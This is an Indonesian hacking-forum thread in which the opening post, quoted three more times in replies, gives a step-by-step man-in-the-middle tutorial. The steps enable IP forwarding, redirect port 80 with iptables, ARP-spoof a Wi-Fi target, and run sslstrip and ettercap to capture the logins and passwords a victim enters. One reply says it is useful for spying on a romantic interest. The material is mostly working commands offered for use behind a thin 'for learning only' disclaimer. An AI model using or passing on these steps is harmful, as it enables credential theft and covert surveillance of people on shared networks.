(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu

Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

(04-29-2016, 04:35 AM)koboi Wrote:

(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu

Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

Nice one (y)

(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu

Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

(04-29-2016, 08:15 AM)teh Wrote: test on kang, lmayan buat kepo si doi hihihi

(05-02-2016, 03:21 AM)owl Wrote:

(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu

Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

nice kang